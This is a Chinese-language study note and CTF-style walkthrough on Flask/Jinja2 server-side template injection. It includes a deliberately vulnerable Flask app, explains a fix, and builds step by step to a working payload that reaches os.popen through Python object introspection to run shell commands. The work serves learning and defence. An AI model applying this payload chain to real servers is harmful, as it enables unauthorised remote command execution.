Python模块注入

注:只是自己学习记录,若有不对的地方请指出,如果觉着我写的不好或者什么的,可以去看我放在下面的大师傅的讲解,都是比较详细的


简单的flask

#encoding: utf-8?
# 导入Flask类
from flask import Flask, render_template_string, request
# 实例化,可视为固定格式
app = Flask(__name__)
@app.route('/test/')
def test():
    code = request.args.get('id')
    html = '''
        

%s

'''
%(code) return render_template_string(html) if __name__ == '__main__': # app.run(host, port, debug, options) # 默认值:host="127.0.0.1", port=5000, debug=False app.run(host="0.0.0.0", port=5000)
注:以上代码存在ssti漏洞点在于render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,我们知道Flask 中使用了Jinja2 作为模板渲染引擎,{{}}在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把{{}}包裹的内容当做变量解析替换。
解决方法:
 将template 中的 ”’

%s!

”’% request.url 更改为 ”’

{{request.url}}

”’ ,这样以来,Jinja2在模板渲染的时候将request.url的值替换掉{{request.url}}, 而不会对request.url内容进行二次渲染(这样即使request.url中含有{{}}也不会进行渲染,而只是把它当做普通字符串),模板注入就是将一串指令代替变量传入模板中让它执行,例如我们在传入‘code’的值时,可以使用{{}}符号来包裹一系列代码,以此代替本应该是参数的id. 如下:hhtp://127.0.0.1/?id={{xxx}}
python常见的魔法方法:
__class__  返回类型所属的对象(类)
__mro__    返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
__base__   返回该对象所继承的基类
// __base__和__mro__都是用来寻找基类的
__subclasses__   每个类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
__init__  类的初始化方法,相当于一个声明
__globals__  对包含函数全局变量的字典的引用
__class__可以获取当前实例的对象(类)
如:
>>> "".__class__  
<class 'str'>
 
 __mro__和__base__都是获取当前类的所有继承类
如:
>>> "".__class__.__mro__
(<class 'str'>, <class 'object'>)
 
__subclasses__每个类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
如:
>> "".__class__.__base__.__subclasses__()
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>,………………..

做题的思路:

通过python的对象的继续来一步步实现文件的读取和命令执行的
首先用__class__读取当前类对象的类
然后用__mro__或者__base__寻找基类
然后用__subclasses__找命令执行或者文件操作的模块
然后使用__init__声明
然后使用__globals__引用模块
简单说一下我的做题经历
做题环境再bugku,buuctf,攻防世界都有,我拿一个我在本地搭建的环境来当作题目
把下面的代码运行,就得到了一个简单的ssit题目
#encoding: utf-8?
#导入Flask类
from flask import Flask, render_template_string, request
#实例化,可视为固定格式
app = Flask(__name__)
@app.route('/test/')
def test():
    code = request.args.get('id')
    html = '''
        

%s

'''
%(code) return render_template_string(html) if __name__ == '__main__': # app.run(host, port, debug, options) # 默认值:host="127.0.0.1", port=5000, debug=False app.run(host="0.0.0.0", port=5000) #访问地址:本机IP

Python模块注入_第1张图片
Python模块注入_第2张图片

第一步,测试:
输入?id={{88}},成功返回了88的计算结果,说明8*8这条指令被服务器执行了,也可以输入?id={{config}},如果成功执行也代表存在模板注入
Python模块注入_第3张图片
Python模块注入_第4张图片

第二步,读取当前字符的类:

?id={{config.__class__}}

Python模块注入_第5张图片

第三步,查找基类:

 ?id={{config.__class__.__mro__}}

Python模块注入_第6张图片
第四步,选择基类查找命令执行或者文件操作的模块:

?id={{config.__class__.__mro__[2].__subclasses__()}}

因为这里object在第三位,而python是从0开始计数的所以写2,为什么选择object,因为所有类的父类,默认所有的类都继承至Object类
Python模块注入_第7张图片
这么多模块,要找到我们想用的模块,这样看有点乱,很多师傅直接编写代码得到想用的模块,我用一种比较笨的方法查找需要用的模块
负责页面的模块,然后编写代码,重新输出,复制到新的文本,然后查找模块
重新输入的代码:

for a in [" "," …………"," "]:#注意要把原先的( , )替换成","
print(a)

然后复制到新的文本,查找popen
在这里插入图片描述位置是415,往前进一位就是414
第五步,引用模块,执行命令:

?id={{config.__class__.__mro__[2].__subclasses__()[414].__init__.__globals___['os'].popen('ls').read()}}

在这里插入图片描述

完成
python 模板注入 - tr1ple - 博客园 (cnblogs.com)
从零学习flask模板注入 - FreeBuf网络安全行业门户
Flask SSTI服务端模板注入初探_哔哩哔哩_bilibili
SSTI模板注入与Flask基础_哔哩哔哩_bilibili

你可能感兴趣的:(python,网络安全,flask)